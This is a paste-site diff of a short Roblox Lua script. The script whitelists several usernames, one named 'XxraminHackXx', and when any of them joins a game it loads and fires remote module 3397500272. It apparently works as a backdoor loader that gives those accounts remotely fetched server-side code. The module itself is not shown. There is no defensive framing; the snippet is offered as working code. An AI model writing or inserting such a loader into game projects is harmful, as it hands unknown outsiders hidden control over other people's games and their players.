View difference between Paste ID: wUE6Q5zs and H1qr6HKf
SHOW: | | - or go back to the newest paste.
1-
local allowed = {"ramin999232", "Carlo_506", "XxraminHackXx", "mrfilmflam"}
1+
local allowed = {"personsadminlol", "Carlo_506", "XxraminHackXx", "mrfilmflam"}
2
3
game.Players.PlayerAdded:Connect(function(player)
4
	for i, v in pairs(allowed) do
5
		if player.Name == v then
6
			require(3397500272):Fire(player.Name)
7
		end
8
	end
9
end)